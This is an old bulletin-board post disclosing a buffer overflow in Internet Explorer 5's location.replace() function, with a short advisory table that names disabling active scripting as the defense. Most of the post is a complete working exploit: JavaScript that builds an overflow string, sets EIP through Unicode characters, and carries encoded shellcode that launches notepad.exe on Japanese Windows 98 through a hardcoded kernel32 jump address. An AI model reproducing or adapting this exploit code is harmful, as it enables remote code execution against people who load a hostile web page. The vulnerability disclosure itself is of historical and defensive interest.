Posted to PENGUIN BBS      09/21 Tue 07:42:42

Name    : L
Title   : location.replace() overflow exploit
URL     : http://layer.webprovider.com/
Contact :  phyx@i.am

---

Internet Explorer has buffer overflow bug on "location.replace()".
If the long string is specified at argument of "location.replace()", buffer overflow will happen.

Platform                Windows 
Application             Internet Explorer 
Confirmed               version 5.00.2314.1003 
Fixed version           None 
Type                    buffer overflow 
Exploitable             Yes 
Reappearance by remote  Yes 
Defense                 Disable active scripting 


For example:

<script>
var longstring = new String();
for(i = 0; i < 8000; i++)
        longstring += "a";
location.replace(longstring);
</script>

At GPF dialogbox, EIP will be 0x00610061 in this case.
JScript is using Unicode for internal character set.
Code of 'a' is 0x61 in ASCII.
But, in Unicode, code of 'a' is 0x0061.
We must use Unicode to exploit this bug.

For example:

<script>
var longstring = new String();
for(i = 0; i < 8000; i++)
        longstring += "\u6161";
location.replace(longstring);
</script>

Now, we can set EIP freely.


Exploit sample that executes notepad.exe for Japanese Windows 98:

<script>
var JMPL = 0xe9;
var NOP = 0x90;
var EIP = 0xBFF72769;  /* jmp %eax @ kernel32 */
var OVERFLOWLENGTH = 8000;
var EXPLOIT = 
        "\u9090\u9090\u9090\u9090\u9090" +
        "\u48eb\u535b\u3053\u88c0\u0a43\u4388\u8811\u1643" +
        "\u4388\ub922\u7750\ubff7\uff53\u89d1\u83c5\u0bc3" +
        "\u28b9\uf76e\u53bf\uff55\u89d1\u83c7\u07c3\u28b9" +
        "\uf76e\u53bf\uff55\u89d1\u83c6\u05c3\uff53\u83d7" +
        "\u04c4\uc031\uff50\u83d6\u04c4\ub3e8\uffff\u6dff" +
        "\u7673\u7263\u2e74\u6c64\u206c\u7973\u7473\u6d65" +
        "\u6520\u6978\u2074\u6f6e\u6574\u6170\u2e64\u7865" +
        "\u2065";     /* exploit code */

function WordToBinary()
{
        var code = "";
        for(i = 0; i < arguments.length; i++)
                code += String.fromCharCode(arguments[i] & 0xffff);
        return code;
}

function LongToBinary()
{
        var code = "";
        for(i = 0; i < arguments.length; i++)
                code += String.fromCharCode( (arguments[i]      ) & 0xffff,
                                             (arguments[i] >> 16) & 0xffff  );
        return code;
}

function MakeExploitString(offset, eip, exploit)
{
        var exstring = "";
        var saddr = LongToBinary(eip);
        var atebx = WordToBinary(0xf8eb) + "z";  /* jmp -6; (padding) */
        var jmpto = (~(exploit.length*2) & 0xffffffff) + 1 - 5;
        var jmpto_exploit =
                        WordToBinary((JMPL << 8) + NOP) + LongToBinary(jmpto);
        var padstr = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
        var padchar = padstr.charAt(0);
        var lengthofpad;
        var i, x;
        
        lengthofpad = offset - atebx.length - jmpto_exploit.length - exploit.length;
        x = Math.floor(lengthofpad / padstr.length);
        for(i = 0; i < x; i++)
                exstring += padstr;
        lengthofpad -= (x * padstr.length);
        for(i = 0; i < lengthofpad; i++)
                exstring += padchar;

        exstring += exploit;
        exstring += jmpto_exploit;
        exstring += atebx;
        exstring += saddr;

        lengthofpad = OVERFLOWLENGTH - exstring.length;
        for(i = 0; i < lengthofpad; i++)
                exstring += padchar;

        return exstring;
}

function overflow()
{
        estr = MakeExploitString(5166,EIP,EXPLOIT);
        location.replace(estr);
}

</script>